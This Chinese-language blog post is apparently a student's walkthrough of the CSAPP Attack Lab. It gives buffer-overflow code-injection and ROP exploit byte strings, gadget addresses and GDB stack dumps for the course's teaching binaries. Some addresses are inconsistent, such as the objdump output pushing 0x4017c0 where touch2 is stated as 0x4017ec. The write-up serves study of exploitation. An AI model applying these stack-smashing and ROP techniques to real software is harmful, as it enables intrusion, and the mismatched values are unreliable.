<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.0.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.0.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.0.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.0.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.0.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '7.0.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="这是 CSAPP 的第二个作业，花了一下午的时间抄了出来">
<meta name="keywords" content="CSAPP,ASM,Exploit">
<meta property="og:type" content="article">
<meta property="og:title" content="[CSAPP Lab]-III Attack Lab">
<meta property="og:url" content="http://lyh.moe/2019/01/04/CSAPP-Lab-III-Attack-Lab/index.html">
<meta property="og:site_name" content="Steve&#39;s">
<meta property="og:description" content="这是 CSAPP 的第二个作业，花了一下午的时间抄了出来">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://ws2.sinaimg.cn/large/006tNc79gy1fyusgexd0oj313e0d40vd.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79gy1fyush1rwz1j30ue052aar.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79gy1fyushhzl9nj30vy0c0di2.jpg">
<meta property="og:image" content="https://ws2.sinaimg.cn/large/006tNc79gy1fyushs8389j30s2088ab8.jpg">
<meta property="og:image" content="https://ws2.sinaimg.cn/large/006tNc79gy1fyutwebztsj30fu0gwjsi.jpg">
<meta property="og:updated_time" content="2019-01-04T13:56:14.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="[CSAPP Lab]-III Attack Lab">
<meta name="twitter:description" content="这是 CSAPP 的第二个作业，花了一下午的时间抄了出来">
<meta name="twitter:image" content="https://ws2.sinaimg.cn/large/006tNc79gy1fyusgexd0oj313e0d40vd.jpg">






  <link rel="canonical" href="http://lyh.moe/2019/01/04/CSAPP-Lab-III-Attack-Lab/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>[CSAPP Lab]-III Attack Lab | Steve's</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Steve's</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://lyh.moe/2019/01/04/CSAPP-Lab-III-Attack-Lab/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Steve">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Steve's">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">[CSAPP Lab]-III Attack Lab

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-01-04 16:28:28 / 修改时间：21:56:14" itemprop="dateCreated datePublished" datetime="2019-01-04T16:28:28+08:00">2019-01-04</time>
            

            
              

              
            
          </span>

          

          
            
            
          

          
          
            <span id="/2019/01/04/CSAPP-Lab-III-Attack-Lab/" class="leancloud_visitors" data-flag-title="[CSAPP Lab]-III Attack Lab">
              <span class="post-meta-divider">|</span>
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              
                <span class="post-meta-item-text">阅读次数：</span>
              
                <span class="leancloud-visitors-count"></span>
            </span>
          

          

          
            <div class="post-symbolscount">
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">本文字数：</span>
                
                <span title="本文字数">5.9k</span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">5 分钟</span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="Part-I-Code-Injection-Attacks"><a href="#Part-I-Code-Injection-Attacks" class="headerlink" title="Part I: Code Injection Attacks"></a>Part I: Code Injection Attacks</h1><h2 id="Level-1"><a href="#Level-1" class="headerlink" title="Level 1"></a>Level 1</h2><p>第一个还是比较简单的，查一下<a href="http://csapp.cs.cmu.edu/3e/attacklab.pdf" target="_blank" rel="noopener">文档</a>，<em>ctarget</em> 的 <code>test</code> 函数是这样的</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">test</span> <span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> val;</span><br><span class="line">    val = getbuf();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"No exploit. Getbuf returned 0x%x\n"</span>, val);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>而得分的目标就是用缓冲区溢出去调用 <code>touch1</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">touch1</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    vlevel = <span class="number">1</span>; <span class="comment">/* Part of validation protocol */</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Touch1!: You called touch1()\n"</span>);</span><br><span class="line">    validate(<span class="number">1</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>而把 <code>getbuf</code> 反汇编出来之后是这样的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">00000000004017a8 &lt;getbuf&gt;:</span><br><span class="line">  4017a8:	48 83 ec 28          	sub    $0x28,%rsp</span><br><span class="line">  4017ac:	48 89 e7             	mov    %rsp,%rdi</span><br><span class="line">  4017af:	e8 8c 02 00 00       	callq  401a40 &lt;Gets&gt;</span><br><span class="line">  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax</span><br><span class="line">  4017b9:	48 83 c4 28          	add    $0x28,%rsp</span><br><span class="line">  4017bd:	c3                   	retq   </span><br><span class="line">  4017be:	90                   	nop</span><br><span class="line">  4017bf:	90                   	nop</span><br></pre></td></tr></table></figure>
<p>发现 <code>getbuf</code> 这个函数每次总是将栈顶指针(<em>%rsp</em>)移动 0x28(40) 位，所以我们的输入只要是超过 40 位的部分就会出现缓冲区溢出</p>
<p>我们的目的是去执行 <code>touch1</code> 这个函数，先找到函数所在的地址</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">00000000004017c0 &lt;touch1&gt;:</span><br><span class="line">  4017c0:	48 83 ec 08          	sub    $0x8,%rsp</span><br><span class="line">  ...</span><br></pre></td></tr></table></figure>
<p>所以我们只需要随便输入 40 位，然后在 40 位的最后添加上 <code>touch1</code> 的地址 <em>4017c0</em> 就可以了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00</span><br><span class="line">C0 17 40 00</span><br></pre></td></tr></table></figure>
<p>(注意 Little Endian 的顺序)</p>
<h2 id="Level-2"><a href="#Level-2" class="headerlink" title="Level 2"></a>Level 2</h2><p>Level 2 就有点麻烦了</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">touch2</span><span class="params">(<span class="keyword">unsigned</span> val)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    vlevel = <span class="number">2</span>;       <span class="comment">/* Part of validation protocol */</span></span><br><span class="line">    <span class="keyword">if</span> (val == cookie) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"Touch2!"</span>):</span><br><span class="line">        validate(<span class="number">2</span>); </span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"Misfire: You called touch2(0x%.8x)\n"</span>, val);</span><br><span class="line">        fail(<span class="number">2</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>); </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看出除了需要调用 <code>touch2</code> 函数之外，传入的参数还需要与 cookie 相同，这里我下载的 self-study 中的 cookie 是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x59b997fa</span><br></pre></td></tr></table></figure>
<p>并且再去看一下反汇编的结果，<code>touch2</code> 的起始地址是在 <em>0x4017ec</em></p>
<p>除了需要把参数传到 <em>rdi</em> 中，还需要讲 <code>touch2</code> 的地址压入栈中，所需要的汇编部分是这样的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mov $0x59b997fa,%rdi</span><br><span class="line">pushq $0x4017ec</span><br><span class="line">retq</span><br></pre></td></tr></table></figure>
<p>用 <code>gcc -c</code> 生成并且 <code>objdump -d</code> 反汇编出来</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">0000000000000000 &lt;.text&gt;:</span><br><span class="line">   0:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi</span><br><span class="line">   7:	68 c0 17 40 00       	pushq  $0x4017c0</span><br><span class="line">   c:	c3                   	retq</span><br></pre></td></tr></table></figure>
<p>但是我们怎么去执行这些语句呢，答案是这些语句将会随着我们的输入一并压入栈中，讲溢出的缓冲区部分设置为这些语句的地址，这样 <code>getbuf</code> return 后就会去执行我们的代码</p>
<p>要得到这些语句的地址，需要用 <em>GDB</em> 调试，先把断点设置在 <code>Gets</code> 的下一行 <code>b *0x4017b4</code> ,然后运行程序，到断点时打印寄存器的值 <code>info registers</code></p>
<p>这里我的 <em>rsp</em> 的值是 <em>0x5561dc78</em> (在不同的电脑上可能不同)，所以我们只要在缓冲区溢出的部分添加上 rsp 的值就可以跳转到我们的语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">48 c7 c7 fa 97 b9 59 // mov    $0x59b997fa,%rdi</span><br><span class="line">68 c0 17 40 00       // pushq  $0x4017c0</span><br><span class="line">c3                   // retq</span><br><span class="line">00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00</span><br><span class="line">78 dc 61 55          // rsp</span><br></pre></td></tr></table></figure>
<h2 id="Level-3"><a href="#Level-3" class="headerlink" title="Level 3"></a>Level 3</h2><p>Level 3 和 2 类似，不过这一次需要传入一个字符串</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">hexmatch</span><span class="params">(<span class="keyword">unsigned</span> val, <span class="keyword">char</span> *sval)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> cbuf[<span class="number">110</span>];</span><br><span class="line">    <span class="keyword">char</span> *s = cbuf + random() % <span class="number">100</span>;</span><br><span class="line">    <span class="built_in">sprintf</span>(s, <span class="string">"%.8x"</span>, val);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">strncmp</span>(sval, s, <span class="number">9</span>) == <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">touch3</span><span class="params">(<span class="keyword">char</span> *sval)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    vlevel = <span class="number">3</span>;</span><br><span class="line">    <span class="keyword">if</span> (hexmatch(cookie, sval))&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"Touch3!: You called touch3(\"%s\")\n"</span>, sval);</span><br><span class="line">        validate(<span class="number">3</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"Misfire: You called touch3(\"%s\")\n"</span>, sval);</span><br><span class="line">        fail(<span class="number">3</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>先把 cookie 转换成字符串是这样的 <code>35 39 62 39 39 37 66 61 00</code> ,注意要在最后加上 <code>00</code> 表示字符串的结束</p>
<p>观察调用 <code>hexmatch</code> 前后的栈的情况</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">(gdb) x /20wx 0x5561dc78</span><br><span class="line">0x5561dc78:	0x00000000	0x00000000	0x00000000	0x00000000</span><br><span class="line">0x5561dc88:	0x00000000	0x00000000	0x00000000	0x00000000</span><br><span class="line">0x5561dc98:	0x00000000	0x00000000	0x55586000	0x00000000</span><br><span class="line">0x5561dca8:	0x00000009	0x00000000	0x00401f24	0x00000000</span><br><span class="line">0x5561dcb8:	0x00000000	0x00000000	0xf4f4f4f4	0xf4f4f4f4</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">(gdb) x /20wx 0x5561dc78</span><br><span class="line">0x5561dc78:	0x0f820d00	0xc5d11383	0x00606010	0x00000000</span><br><span class="line">0x5561dc88:	0x55685fe8	0x00000000	0x00000004	0x00000000</span><br><span class="line">0x5561dc98:	0x00401916	0x00000000	0x555860000	0x00000000</span><br><span class="line">0x5561dca8:	0x00000009	0x00000000	0x00401f24	0x00000000</span><br><span class="line">0x5561dcb8:	0x00000000	0x00000000	0xf4f4f4f4	0xf4f4f4f4</span><br></pre></td></tr></table></figure>
<p><em>0x5561dca8</em> 之后的地址在调用前后是没有改变的，所以我们将字符串放在那里就可以</p>
<p><em>0x5561dc78</em>~<em>0x5561dc9f</em> 是输入的 40 个字符，所以我们把字符串放到 <em>0x5561dca8</em>~<em>0x5561dcae</em> 的位置(注意//处)</p>
<p>按照 Level 2 类似的方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mov $0x5561dcc8,%rdi</span><br><span class="line">push $0x4018fa # touch3</span><br><span class="line">ret</span><br></pre></td></tr></table></figure>
<p>然后输入就应该是这样的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">48 c7 c7 a8 dc 61 55 68</span><br><span class="line">fa 18 40 00 c3 00 00 00 </span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 // 使缓冲区溢出</span><br><span class="line">78 dc 61 55 00 00 00 00 // 指向新加入的语句(第一行)</span><br><span class="line"></span><br><span class="line">35 39 62 39 39 37 66 61 00 // cookie Addr:0x5561dca8</span><br></pre></td></tr></table></figure>
<h1 id="Part-II-Return-Oriented-Programming"><a href="#Part-II-Return-Oriented-Programming" class="headerlink" title="Part II: Return-Oriented Programming"></a>Part II: Return-Oriented Programming</h1><p>之前的方法我们是在 Stack 中插入可以执行的代码，但是现代操作系统采用了一些手段来避免这样的事情</p>
<ul>
<li>栈的位置是随机的，无法确定跳转的位置</li>
<li>栈多了一个是否可以执行的属性，没发在栈中添加指令</li>
</ul>
<p>所以就需要新的方法了，Return-Oriented Programming(ROP) 正是利用了程序中已经存在的指令</p>
<p><img src="https://ws2.sinaimg.cn/large/006tNc79gy1fyusgexd0oj313e0d40vd.jpg" alt="movq"></p>
<p><img src="https://ws1.sinaimg.cn/large/006tNc79gy1fyush1rwz1j30ue052aar.jpg" alt="popq"></p>
<p><img src="https://ws1.sinaimg.cn/large/006tNc79gy1fyushhzl9nj30vy0c0di2.jpg" alt="movl"></p>
<p><img src="https://ws2.sinaimg.cn/large/006tNc79gy1fyushs8389j30s2088ab8.jpg" alt=""></p>
<h2 id="Level-2-1"><a href="#Level-2-1" class="headerlink" title="Level 2"></a>Level 2</h2><p>ROP 的 Level 2 和之前的是一样的，需要我们将 cookie 作为参数调用 touch2</p>
<p>问题的关键在于如何搞到 cookie ，找一下 farm 中的函数，我们可以使用的是 <code>popq</code> </p>
<ol>
<li><code>popq %rax</code></li>
<li><code>mov %rax,%rdi</code></li>
<li>呼叫 <code>touch2</code> 函数</li>
</ol>
<p>查表可知 <code>popq %rax</code> 对应的 16 进制是 <code>58</code> ，而且要在后边出现 <code>c3</code> 不过在反汇编的文件中并没有找到这两个指令连在一起的地方，这里需要的一个知识 <a href="https://en.wikipedia.org/wiki/NOP_(code" target="_blank" rel="noopener">NOP</a>) 指令，这个指令在 x86-64 中是 <code>0x90</code> ,作用就是没有作用…</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">00000000004019a7 &lt;addval_219&gt;:</span><br><span class="line">  4019a7:	8d 87 51 73 58 90    	lea    -0x6fa78caf(%rdi),%eax</span><br><span class="line">  4019ad:	c3                   	retq</span><br></pre></td></tr></table></figure>
<p>在反汇编中找到了 <code>popq %rax</code> 的指令地址是 <code>0x4019ab</code></p>
<p>同理， <code>mov %rax,%rdi</code> 的地址是 <code>0x4019a2</code>, <code>touch2</code> 的地址是 <code>0x4017ec</code></p>
<p>所以我们的 Stack 应该是这样的</p>
<p><img src="https://ws2.sinaimg.cn/large/006tNc79gy1fyutwebztsj30fu0gwjsi.jpg" alt=""></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 // 使缓冲区溢出</span><br><span class="line">ab 19 40 00 00 00 00 00 // popq %rax</span><br><span class="line">fa 97 b9 59 00 00 00 00 // cookie</span><br><span class="line">a2 19 40 00 00 00 00 00 // mov %rax,%rdi</span><br><span class="line">ec 17 40 00 00 00 00 00 // touch2</span><br></pre></td></tr></table></figure>
<h2 id="Level-3-1"><a href="#Level-3-1" class="headerlink" title="Level 3"></a>Level 3</h2><p>这个需要传入字符串，需要 <del>YY</del> ，因为需要在已有的指令中寻找，所以说需要在寄存器中不断的操作，大概的思路如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">栈顶</span><br><span class="line">movq %rsp,%rax</span><br><span class="line">movq %rax,%rdi</span><br><span class="line">popq %rax</span><br><span class="line">这里是一个offset</span><br><span class="line">movl %rax,%rdx</span><br><span class="line">movl %rdx,%rcx</span><br><span class="line">movl %rcx,%rsi</span><br><span class="line">lea (%rdi,%rsi,1),%rax</span><br><span class="line">movq %rax,%rdi</span><br><span class="line">字符串</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">00 00 00 00 00 00 00 00 </span><br><span class="line">00 00 00 00 00 00 00 00 </span><br><span class="line">00 00 00 00 00 00 00 00 </span><br><span class="line">00 00 00 00 00 00 00 00 </span><br><span class="line">00 00 00 00 00 00 00 00 // 溢出</span><br><span class="line">06 1a 40 00 00 00 00 00 // movq %rsp,%rax</span><br><span class="line">a2 19 40 00 00 00 00 00 // movq %rax,%rdi</span><br><span class="line">ab 19 40 00 00 00 00 00 // popq %rax</span><br><span class="line">48 00 00 00 00 00 00 00 // 0x48 = 72 共有 9 条指令，每条 8 个 Byte</span><br><span class="line">dd 19 40 00 00 00 00 00 // movl %rax,%rdx</span><br><span class="line">69 1a 40 00 00 00 00 00 // movl %rdx,%rcx</span><br><span class="line">13 1a 40 00 00 00 00 00 // movl %rcx,%rsi</span><br><span class="line">d6 19 40 00 00 00 00 00 // lea (%rdi,%rsi,1),%rax</span><br><span class="line">c5 19 40 00 00 00 00 00 // movq %rax,%rdi</span><br><span class="line">fa 18 40 00 00 00 00 00 // touch3</span><br><span class="line">35 39 62 39 39 37 66 61 00 // cookie</span><br></pre></td></tr></table></figure>
<p>终于搞定，计算机器语言的偏移量真不容易，还是高级语言舒服啊…</p>
      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CSAPP/" rel="tag"># CSAPP</a>
          
            <a href="/tags/ASM/" rel="tag"># ASM</a>
          
            <a href="/tags/Exploit/" rel="tag"># Exploit</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/04/CSAPP-Lab-II-Bomb-Lab/" rel="next" title="[CSAPP Lab]-II Bomb Lab">
                <i class="fa fa-chevron-left"></i> [CSAPP Lab]-II Bomb Lab
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/01/26/CSAPP-Lab-IV-Cache-Lab/" rel="prev" title="[CSAPP Lab]-IV Cache Lab">
                [CSAPP Lab]-IV Cache Lab <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Steve">
            
              <p class="site-author-name" itemprop="name">Steve</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">7</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">6</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/stevelee477" title="GitHub &rarr; https://github.com/stevelee477" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
